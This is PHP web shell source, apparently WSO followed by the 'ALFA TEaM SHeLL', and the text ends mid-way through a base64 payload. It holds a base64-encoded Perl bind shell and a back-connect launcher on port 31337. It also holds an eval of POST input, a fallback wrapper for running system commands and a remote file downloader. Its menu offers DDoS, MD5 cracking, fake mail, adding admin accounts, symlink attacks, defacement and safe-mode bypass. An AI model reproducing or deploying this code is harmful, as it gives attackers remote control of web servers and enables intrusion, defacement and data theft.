$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content>
198. <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
199. <span>Bind port to /bin/sh [perl]</span><br/>
200. Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
201. </form>
202. <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
203. <span>Back-connect [perl]</span><br/>
204. Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
205. </form><br>"; if(isset($_POST['p1'])) { function cf($f,$t) { $w = @fopen($f,"w") or @function_exists('file_put_contents'); if($w){ @fwrite($w,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &"); sleep(1); echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>"; unlink("/tmp/bp.pl"); } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &"); sleep(1); echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>"; unlink("/tmp/bc.pl"); } } echo '</div>'; wsoFooter(); } function actionRC() { if(!@$_POST['p1']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'SecInfo'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); exit;
206. }
207.  
208.  
209. @define('VERSION','1.0');
210. @error_reporting(E_ALL ^ E_NOTICE);
211. @session_start();
212. @ini_set('error_log',NULL);
213. @ini_set('log_errors',0);
214. @ini_set('max_execution_time',0);
215. @set_time_limit(0);
216. @set_magic_quotes_runtime(0);
217. if(get_magic_quotes_gpc()) {
218. function alfastripslashes($array) {
219. return is_array($array) ? array_map('alfastripslashes', $array) : stripslashes($array);
220. }
221. $_POST = alfastripslashes($_POST);
222. }
223. $default_action = 'FilesMan';
224. $default_use_ajax = true;
225. $default_charset = 'Windows-1251';
226. if (strtolower(substr(PHP_OS,0,3))=="win")
227. $sys='win';
228. else
229. $sys='unix';
230. $home_cwd = @getcwd();
231. if(isset($_POST['c']))
232. @chdir($_POST['c']);
233. $cwd = @getcwd();
234. if($sys == 'win')
235. {
236. $home_cwd = str_replace("\\", "/", $home_cwd);
237. $cwd = str_replace("\\", "/", $cwd);
238. }
239. if($cwd[strlen($cwd)-1] != '/' )
240. $cwd .= '/';
241. function alfaEx($in) {
242. $out = '';
243. if (function_exists('exec')) {
244. @exec($in,$out);
245. $out = @join("\n",$out);
246. } elseif (function_exists('passthru')) {
247. ob_start();
248. @passthru($in);
249. $out = ob_get_clean();
250. } elseif (function_exists('system')) {
251. ob_start();
252. @system($in);
253. $out = ob_get_clean();
254. } elseif (function_exists('shell_exec')) {
255. $out = shell_exec($in);
256. } elseif (is_resource($f = @popen($in,"r"))) {
257. $out = "";
258. while(!@feof($f))
259. $out .= fread($f,1024);
260. pclose($f);
261. }
262. return $out;
263. }
264. $down=@getcwd();
265. if($sys=="win")
266. $down.='\\';
267. else
268. $down.='/';
269. if(isset($_POST['rtdown']))
270. {
271. $url = $_POST['rtdown'];
272. $newfname = $down. basename($url);
273. $file = fopen ($url, "rb");
274. if ($file) {
275. $newf = fopen ($newfname, "wb");
276. if ($newf)
277. while(!feof($file)) {
278. fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
279. }
280. }
281. if ($file) {
282. fclose($file);
283. }
284. if ($newf) {
285. fclose($newf);
286. }
287. }
288. function alfahead()
289. {
290. if(empty($_POST['charset']))
291. $_POST['charset'] = $GLOBALS['default_charset'];
292. $freeSpace = @diskfreespace($GLOBALS['cwd']);
293. $totalSpace = @disk_total_space($GLOBALS['cwd']);
294. $totalSpace = $totalSpace?$totalSpace:1;
295. $on="<font color=#0F0> ON </font>";
296. $of="<font color=red> OFF </font>";
297. $none="<font color=#0F0> NONE </font>";
298. if(function_exists('curl_version'))
299. $curl=$on;
300. else
301. $curl=$of;
302. if(function_exists('mysql_get_client_info'))
303. $mysql=$on;
304. else
305. $mysql=$of;
306. if(function_exists('mssql_connect'))
307. $mssql=$on;
308. else
309. $mssql=$of;
310. if(function_exists('pg_connect'))
311. $pg=$on;
312. else
313. $pg=$of;
314. if(function_exists('oci_connect'))
315. $or=$on;
316. else
317. $or=$of;
318. if(@ini_get('disable_functions'))
319. $disfun=@ini_get('disable_functions');
320. else
321. $disfun="All Functions Enabled";
322. if(@ini_get('safe_mode'))
323. $safe_modes="<font color=red>ON</font>";
324. else
325. $safe_modes="<font color=#0F0 >OFF</font>";
326. if(@ini_get('open_basedir'))
327. $open_b=@ini_get('open_basedir');
328. else
329. $open_b=$none;
330. if(@ini_get('safe_mode_exec_dir'))
331. $safe_exe=@ini_get('safe_mode_exec_dir');
332. else
333. $safe_exe=$none;
334. if(@ini_get('safe_mode_include_dir'))
335. $safe_include=@ini_get('safe_mode_include_dir');
336. else
337. $safe_include=$none;
338. if(!function_exists('posix_getegid'))
339. {
340. $user = @get_current_user();
341. $uid = @getmyuid();
342. $gid = @getmygid();
343. $group = "?";
344. } else
345. {
346. $uid = @posix_getpwuid(posix_geteuid());
347. $gid = @posix_getgrgid(posix_getegid());
348. $user = $uid['name'];
349. $uid = $uid['uid'];
350. $group = $gid['name'];
351. $gid = $gid['gid'];
352. }
353. $cwd_links = '';
354. $path = explode("/", $GLOBALS['cwd']);
355. $n=count($path);
356. for($i=0; $i<$n-1; $i++) {
357. $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
358. for($j=0; $j<=$i; $j++)
359. $cwd_links .= $path[$j].'/';
360. $cwd_links .= "\")'>".$path[$i]."/</a>";
361. }
362. $drives = "";
363. foreach(range('c','z') as $drive)
364. if(is_dir($drive.':\\'))
365. $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
366. echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
367. <html xmlns="http://www.w3.org/1999/xhtml">
368. <head>
369. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
370. <link href="http://iran.grn.cc/13.png" rel="icon" type="image/x-icon"/>
371. <title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM SHeLL ::..</title>
372. <style type="text/css">
373. <!--
374. #alert {position: relative;}
375. #alert:hover:after {
376. background: hsla(0,0%,0%,.8);
377. border-radius: 3px;
378. color: #f6f6f6;
379. content: \'Hidden shell\';
380. font: bold 12px/30px sans-serif;
381. height: 30px;
382. left: 50%;
383. margin-left: -60px;
384. position: absolute;
385. text-align: center;
386. top: 50px; width: 120px;
387. }
388. #alert:hover:before {
389. border-bottom: 10px solid hsla(0,0%,0%,.8);
390. border-left: 10px solid transparent;
391. border-right: 10px solid transparent;content: \'\';
392. height: 0;
393. left: 50%;
394. margin-left: -10px;
395. position: absolute;
396. top: 40px;
397. width: 0;
398. }
399. #alert:target {display: none;}
400. .alert_red {
401. animation: alert 1s ease forwards;
402. background-color: #c4453c;
403. background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));
404. background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);
405. color: #f6f6f6;display: block;
406. font: bold 16px/40px sans-serif;
407. height: 40px;
408. position: absolute;
409. text-align: center;
410. text-decoration: none;
411. top: -5px;
412. width: 100%;
413. }
414. .alert_green {animation: alert 1s ease forwards;
415. background-color: #27979B;
416. background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));
417. background-size: 20px 20px;
418. box-shadow: 0 5px 0 hsla(0,0%,0%,.1);
419. color: #f6f6f6;
420. display: block;
421. font: bold 16px/40px sans-serif;
422. height: 40px;
423. position: absolute;
424. text-align: center;
425. text-decoration: none;
426. top: -5px;
427. width: 100%;
428. }
429. @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}
430. .whole {
431. background-color: #0E304A;
432. height:auto;
433. width: auto;
434. margin-top: 10px;
435. margin-right: 10px;
436. margin-left: 10px;
437. }
438. .header {
439. height: auto;
440. width: auto;
441. border: 7px solid #0E304A;
442. color: #67ABDF;
443. font-size: 12px;
444. font-family: Verdana, Geneva, sans-serif;
445. background-color: #000;
446. }
447. .header a {color:#0F0; text-decoration:none;}
448. span {
449. font-weight: bolder;
450. color: #FFF;
451. }
452. #meunlist {
453. font-family: Verdana, Geneva, sans-serif;
454. color: #FFF;
455. background-color: #000;
456. width: auto;
457. border-right-width: 7px;
458. border-left-width: 7px;
459. border-top-style: solid;
460. border-right-style: solid;
461. border-bottom-style: solid;
462. border-left-style: solid;
463. border-top-color: #0E304A;
464. border-right-color: #0E304A;
465. border-bottom-color: #0E304A;
466. border-left-color: #0E304A;
467. height: auto;
468. font-size: 12px;
469. font-weight: bold;
470. border-top-width: 0px;
471. }
472. .whole #meunlist ul {
473. padding-top: 5px;
474. padding-right: 5px;
475. padding-bottom: 7px;
476. padding-left: 2px;
477. text-align:center;
478. list-style-type: none;
479. margin: 0px;
480. }
481. .whole #meunlist li {
482. margin: 0px;
483. padding: 0px;
484. display: inline;
485. }
486. .whole #meunlist a {
487. font-family: arial, sans-serif;
488. font-size: 14px;
489. text-decoration:none;
490. font-weight: bold;
491. color: #fff;
492. clear: both;
493. width: 100px;
494. margin-right: -6px;
495. padding-top: 3px;
496. padding-right: 15px;
497. padding-bottom: 3px;
498. padding-left: 15px;
499. border-right-width: 1px;
500. border-right-style: solid;
501. border-right-color: #FFF;
502. }
503. .whole #meunlist a:hover {
504. color: #000;
505. background: #646464;
506. }
507. .foot {
508. font-family: Verdana, Geneva, sans-serif;
509. background-color: #000;
510. margin: 0px;
511. padding: 0px;
512. width: 100%;
513. text-align: center;
514. font-size: 12px;
515. color: #0E304A;
516. border-right-width: 7px;
517. border-left-width: 7px;
518. border-bottom-width: 7px;
519. border-bottom-style: solid;
520. border-right-style: solid;
521. border-right-style: solid;
522. border-left-style: solid;
523. border-top-color: #0E304A;
524. border-right-color: #0E304A;
525. border-bottom-color: #0E304A;
526. border-left-color: #0E304A;
527. }
528. #text{
529. text-align:center;
530. }
531. ';
532. if(is_writable($GLOBALS['cwd']))
533. {
534. echo ".foottable {
535. width: 300px;
536. font-weight: bold;
537. }";}
538. else
539. {
540. echo ".foottable {
541. width: 300px;
542. font-weight: bold;
543. background-color:red;
544. }
545. .dir {
546. background-color:red;
547. }
548. ";
549. }
550. echo '.main th{text-align:left;}
551. .main a{color: #FFF;}
552. .main tr:hover{background-color:#646464;}
553. .ml1{ border:1px solid #0E304A;padding:5px;margin:0;overflow: auto; }
554. .bigarea{ width:99%; height:300px; }
555. </style>
556. ';
557. echo "<script>
558. var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
559. var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
560. var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
561. var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
562. var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
563. var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
564. var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
565. var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
566. var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
567. var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
568. var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
569. var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
570. var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
571. var d = document;
572. function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
573. if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
574. if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
575. if(alfa1!=null)d.mf.alfa1.value=alfa1;else d.mf.alfa1.value=alfa1_;
576. if(alfa2!=null)d.mf.alfa2.value=alfa2;else d.mf.alfa2.value=alfa2_;
577. if(alfa3!=null)d.mf.alfa3.value=alfa3;else d.mf.alfa3.value=alfa3_;
578. if(alfa4!=null)d.mf.alfa4.value=alfa4;else d.mf.alfa4.value=alfa4_;
579. if(alfa5!=null)d.mf.alfa5.value=alfa5;else d.mf.alfa5.value=alfa5_;
580. if(alfa6!=null)d.mf.alfa6.value=alfa6;else d.mf.alfa6.value=alfa6_;
581. if(alfa7!=null)d.mf.alfa7.value=alfa7;else d.mf.alfa7.value=alfa7_;
582. if(alfa8!=null)d.mf.alfa8.value=alfa8;else d.mf.alfa8.value=alfa8_;
583. if(alfa9!=null)d.mf.alfa9.value=alfa9;else d.mf.alfa9.value=alfa9_;
584. if(alfa10!=null)d.mf.alfa10.value=alfa10;else d.mf.alfa10.value=alfa10_;
585. if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
586. }
587. function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
588. set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset);
589. d.mf.submit();
590. }</script>";
591. echo '
592. </head>
593. <body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
594. <div class="whole">
595. <form method=post name=mf style="display:none;">
596. <input type=hidden name=a>
597. <input type=hidden name=c>
598. <input type=hidden name=alfa1>
599. <input type=hidden name=alfa2>
600. <input type=hidden name=alfa3>
601. <input type=hidden name=alfa4>
602. <input type=hidden name=alfa5>
603. <input type=hidden name=alfa6>
604. <input type=hidden name=alfa7>
605. <input type=hidden name=alfa8>
606. <input type=hidden name=alfa9>
607. <input type=hidden name=alfa10>
608. <input type=hidden name=charset>
609. </form>
610. <div id=\'alert\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell Is Here ( Click )</font></a></div><br><p>
611. <div class="header"><table width="100%" border="0" align="lift">
612. <tr>
613. <td width="3%"><span><font color=#27979B>Uname:</font></span></td>
614. <td colspan="2"><b>'.substr(@php_uname(), 0, 120).'</b></td>
615. </tr>
616. <tr>
617. <td><span><font color=#27979B>User:</font></span></td>
618. <td><b>'. $uid . ' [ ' . $user . ' ] </b><span> <font color=#27979B> Group: </font></span><b>' . $gid . ' [ ' . $group . ' ]</b> </td>
619. <td width="12%" rowspan="8"><img alt="" src="http://iran.grn.cc/farvahar-iran.png" /></td>
620. </tr>
621. <tr>
622. <td><span><font color=#27979B>PHP:</font></span></td>
623. <td><b>'.@phpversion(). ' </b><span> <font color=#27979B> Safe Mode: </font>'.$safe_modes.'</span></td>
624. </tr>
625. <tr>
626. <td><span><font color=#27979B>ServerIP:</font></span></td>
627. <td><b>'.@$_SERVER["SERVER_ADDR"].' <span><font color=#27979B>Your IP:</font></span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>
628. </tr>
629. <tr>
630. <td><span><font color=#27979B>Domains:</font></span></td>
631. <td width="76%"><b>';
632. if($GLOBALS['sys']=='unix')
633. {
634. $d0mains = @file("/etc/named.conf");
635. if(!$d0mains)
636. {
637. echo "CANT READ named.conf";
638. }
639. else
640. {
641. $count;
642. foreach($d0mains as $d0main)
643. {
644. if(@ereg("zone",$d0main))
645. {
646. preg_match_all('#zone "(.*)"#', $d0main, $domains);
647. flush();
648. if(strlen(trim($domains[1][0])) > 2){
649. flush();
650. $count++;
651. }
652. }
653. }
654. echo "$count Domains";
655. }
656. }
657. else{ echo"CANT READ |Windows|";}
658. echo '</b></td>
659. </tr>
660. <tr>
661. <td height="16"><span><font color=#27979B>HDD:<font></span></td>
662. <td><span><font color=#27979B>Total:</font></span><b>'.alfaSize($totalSpace).' </b><span><font color=#27979B>Free:</font></span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
663. </tr>';
664. if($GLOBALS['sys']=='unix' )
665. {
666. if(!@ini_get('safe_mode'))
667. {
668. if(function_exists("system") || function_exists("exec") || function_exists("passthru") || function_exists("shell_exec")){
669. echo '<tr><td height="18" colspan="2"><span><font color=#27979B>Useful : </font></span><b>';
670. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
671. foreach($userful as $item)
672. if(alfaWhich($item))
673. echo $item.',';
674. echo '</b></td>
675. </tr>
676. <tr>
677. <td height="0" colspan="2"><span><font color=#27979B>Downloader:</font></span>';
678. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
679. foreach($downloaders as $item2)
680. if(alfaWhich($item2))
681. echo '<b>'.$item2.',';
682. echo '</b></td>
683. </tr>';
684. }else{
685. echo '<tr><td height="18" colspan="2"><span><font color=#27979B>useful:<font></span>';
686. echo '--------------</td>
687. </tr><td height="0" colspan="2"><span><font color=#27979B>Downloader:</font> </span>-------------</td>
688. </tr>';
689. }
690. }
691. else
692. {
693. echo '<tr><td height="18" colspan="2"><span><font color=#27979B>useful:<font></span>';
694. echo '--------------</td>
695. </tr><td height="0" colspan="2"><span><font color=#27979B>Downloader:</font> </span>-------------</td>
696. </tr>';
697. }
698. }
699. else
700. {
701. echo '<tr><td height="18" colspan="2"><span><font color=#27979B>Window:</font></span><b>';
702. echo alfaEx('ver');
703. echo '</td>
704. </tr> <tr>
705. <td height="0" colspan="2"><span><font color=#27979B>Downloader:</font> </span>-------------</td>
706. </tr></b>';
707. }
708. $quotes = get_magic_quotes_gpc();if ($quotes == "1" or $quotes == "on"){$magic = '<b><font color="#0F0">ON</font>';}else{$magic = '<b><font color="red">OFF</font>';}
709. echo '<tr>
710. <td height="16" colspan="2"><span><font color=#27979B>Disabled Functions:</font></span><b>'.$disfun.'</b></td>
711. </tr>
712. <tr>
713. <td height="16" colspan="2"><span><font color=#27979B>CURL:</font><b>'.$curl.' </b><font color=#27979B>Magic Quotes:</font><b>'.$magic.' </b><font color=#27979B> MySQL:</font><b>'.$mysql.' </b><font color=#27979B>MSSQL:</font><b>'.$mssql.' </b><font color=#27979B> PostgreSQL:</font><b>'.$pg.'</b> <font color=#27979B> Oracle:</font> </span><b>'.$or.'</b></td><td width="15%">'.base64_decode("PGEgaHJlZj0iaHR0cDovL3pvbmUtaC5vcmcvYXJjaGl2ZS9ub3RpZmllcj1BTEZBJTIwVEVhTSUyMDIwMTIiIHRhcmdldD0iX2JsYW5rIj48c3Bhbj48Zm9udCBjb2xvcj0iIzBGMCI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7U29sZSBTYWQgJiBJbnZpc2libGU8L2ZvbnQ+PC9zcGFuPjwvYT4=").'</td>
714. </tr>
715. <tr>
716. <td height="11" colspan="3"><span><font color=#27979B>Open_basedir:<b>'.$open_b.'</b></font> <font color=#27979B>Safe_mode_exec_dir:</b>'.$safe_exe.'</b> </font><font color=#27979B> Safe_mode_include_dir:</b>'.$safe_include.'</b></font></td>
717. </tr>
718. <tr>
719. <td height="11"><span><font color=#27979B>SoftWare:<font color=#27979B> </span></td>
720. <td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
721. </tr>';
722. if($GLOBALS[sys]=="win")
723. {
724. echo '<tr>
725. <td height="12"><span><font color=#27979B>DRIVE:</font></span></td>
726. <td colspan="2"><b>'.$drives.'</b></td>
727. </tr>';
728. }
729. echo '<tr>
730. <td height="12"><span><font color=#27979B>PWD:</font></span></td>
731. <td colspan="2">'.$cwd_links.' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><font color=red >| Home Shell |</font></a></td>
732. </tr>
733. </table>
734. </div>
735. <div id="meunlist">
736. <ul>
737. <li><a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')"><font color=#27979B>Home</font></a></li>
738. <li><a href="#" onclick="g(\'proc\',null,\'\',\'\',\'\')"><font color=#27979B>Process</font></a></li>
739. <li><a href="#" onclick="g(\'phpeval\',null,\'\',\'\',\'\')"><font color=#27979B>Eval</font></a></li>
740. <li><a href="#" onclick="g(\'sql\',null,\'\',\'\',\'\')"><font color=#27979B>SQL</font></a></li>
741. <li><a href="#" onclick="g(\'hash\',null,\'\',\'\',\'\')"><font color=#27979B>En-Decoder</font></a></li>
742. <li><a href="#" onclick="g(\'connect\',null,\'\',\'\',\'\')"><font color=#27979B>BC</font></a></li>
743. <li><a href="#" onclick="g(\'zoneh\',null,\'\',\'\',\'\')"><font color=#27979B>ZONE-H</font></a></li>
744. <li><a href="#" onclick="g(\'dos\',null,\'\',\'\',\'\')"><font color=#27979B>DDOS</font></a></li>
745. <li><a href="#" onclick="g(\'safe\',null,\'\',\'\',\'\')"><font color=#27979B>ByPasser</font></a></li>
746. <li><a href="#" onclick="g(\'cgishell\',null,\'\',\'\',\'\')"><font color=#27979B>Cgi Perl</font></a></li>
747. <li><a href="#" onclick="g(\'cgipython\',null,\'\',\'\',\'\')"><font color=#27979B>Cgi Python</font></a></li>
748. <li><a href="#" onclick="g(\'cmdphp\',null,\'\',\'\',\'\')"><font color=#27979B>CMD</font></a></li>
749. <li><a href="#" onclick="g(\'cpcrack\',null,\'\',\'\',\'\')"><font color=#27979B>MD5 Cracker</font></a></li>
750. <li><a href="#" onclick="g(\'portscanner\',null,\'\',\'\',\'\')"><font color=#27979B>Port Scaner</font></a></li>
751. <li><a href="#" onclick="g(\'basedir\',null,\'\',\'\',\'\')"><font color=#27979B>Open BaseDir</font></a></li>
752. <li><a href="#" onclick="g(\'mail\',null,\'\',\'\',\'\')"><font color=#27979B>Fake Mail</font></a></li>
753. <li><a href="#" onclick="g(\'ziper\',null,\'\',\'\',\'\')"><font color=#27979B>Ziper</font></a></li>
754. <li><a href="#" onclick="g(\'IndexChanger\',null,\'\',\'\',\'\')"><font color=#27979B>Index Changer</font></a></li>
755. <li><a href="#" onclick="g(\'pwchanger\',null,\'\',\'\',\'\')"><font color=#27979B>Add New Admin</font></a></li>
756. <li><a href="#" onclick="g(\'Vbinject\',null,\'\',\'\',\'\')"><font color=#27979B>Vb Shell inject</font></a></li>
757. <li><a href="#" onclick="g(\'php2xml\',null,\'\',\'\',\'\')"><font color=#27979B>PHP2XML</font></a></li>
758. <li><a href="#" onclick="g(\'cloudflare\',null,\'\',\'\',\'\')"><font color=#27979B>CloudFlare</font></a></li>
759. <li><a href="#" onclick="g(\'Whmcs\',null,\'\',\'\',\'\')"><font color=#27979B>Whmcs</font></a></li>
760. <li><a href="#" onclick="g(\'symlink\',null,\'\',\'\',\'\')"><font color=#27979B>Symlink</font></a></li>
761. <li><a href="#" onclick="g(\'team\',null,\'\',\'\',\'\')"><font color=#27979B>About Us</font></a></li>
762. <li><a href="#" onclick="g(\'selfrm\',null,\'\',\'\',\'\')"><font color=#27979B>Remove Shell</font></a></li>
763. </ul>
764. </div>
765. ';
766. }
767. function alfacmdphp(){
768. alfahead();
769. echo '<div class=header>';
770. $code = 'PD9waHANCi8vZGlzYWJsZSBtYWdpYyBxdW90ZXMhIQ0KZXJyb3JfcmVwb3J0aW5nKEVfQUxMXkVfTk9USUNFKTsNCiR0ZiA9IGV4cGxvZGUoJy8nLCAkX1NFUlZFUlsiU0NSSVBUX05BTUUiXSk7DQokdGYgPSAkdGZbY291bnQoJHRmKS0xXTsNCmlmIChnZXRfbWFnaWNfcXVvdGVzX2dwYygpKQ0Kew0KICRwcm9jZXNzID0gYXJyYXkoJiRfR0VULCAmJF9QT1NULCAmJF9DT09LSUUsICYkX1JFUVVFU1QpOw0KIHdoaWxlIChsaXN0KCRrZXksICR2YWwpID0gZWFjaCgkcHJvY2VzcykpDQogew0KICBmb3JlYWNoICgkdmFsIGFzICRrID0+ICR2KQ0KICB7DQogICB1bnNldCgkcHJvY2Vzc1ska2V5XVska10pOw0KICAgaWYgKGlzX2FycmF5KCR2KSkNCiAgIHsNCiAgICAkcHJvY2Vzc1ska2V5XVtzdHJpcHNsYXNoZXMoJGspXSA9ICR2Ow0KICAgICRwcm9jZXNzW10gPSAmJHByb2Nlc3NbJGtleV1bc3RyaXBzbGFzaGVzKCRrKV07DQogICB9DQogICBlbHNlDQogICB7DQogICAgJHByb2Nlc3NbJGtleV1bc3RyaXBzbGFzaGVzKCRrKV0gPSBzdHJpcHNsYXNoZXMoJHYpOw0KICAgfQ0KICB9DQogfQ0KIHVuc2V0KCRwcm9jZXNzKTsNCn0NCi8vDQpmdW5jdGlvbiBzaGVsbF9leGVjMigkc3RyLCAkY3dkKQ0Kew0KICRwaXBlcyA9IGFycmF5KCk7DQogJHByb2Nlc3MgPSBwcm9jX29wZW4oJHN0ci4nIDI+JjEnLCBhcnJheShhcnJheSgicGlwZSIsInciKSwgYXJyYXkoInBpcGUiLCJ3IiksIGFycmF5KCJwaXBlIiwidyIpKSwgJHBpcGVzLCAkY3dkKTsNCiByZXR1cm4gc3RyZWFtX2dldF9jb250ZW50cygkcGlwZXNbMV0pOw0KfQ0KaWYgKCRfUE9TVFsndmVyaWZ5J10pDQp7DQogJGRpcm5vdyA9IHNoZWxsX2V4ZWMyKCJwd2QiLCAkX1BPU1RbJ3ZlcmlmeSddKTsNCiBpZiAoc3Vic3RyKCRkaXJub3csIDAsIHN0cmxlbigkZGlybm93KS0xKT09JF9QT1NUWyd2ZXJpZnknXSkNCiB7DQogIGVjaG8oJ2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikudmFsdWUgKz0gIlxuIjsgIG5ld2NtZCgpOycpOw0KIH0NCiBlbHNlDQogew0KICAkZWUgPSBleHBsb2RlKCcvJywgJF9QT1NUWyd2ZXJpZnknXSk7DQogIGVjaG8oJ2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjb21tYW5kIikudmFsdWUgKz0gIlxuYmFzaDogY2Q6ICcuJF9QT1NUWyd2ZXJpZnknXS4nOiBQZXJtaXNzaW9uIGRlbmllZCFcbiI7ICBuZXdjbWQoKTsnKTsNCiB9DQogZXhpdDsNCn0NCmlmICgkX1BPU1RbJ2p4Y21kJ10gJiYgJF9QT1NUWydjd2QnXSkgLy95ZWEsIGdvIEFKQVgNCnsNCiAkdGhlY21kID0gJF9QT1NUWydqeGNtZCddOw0KIGl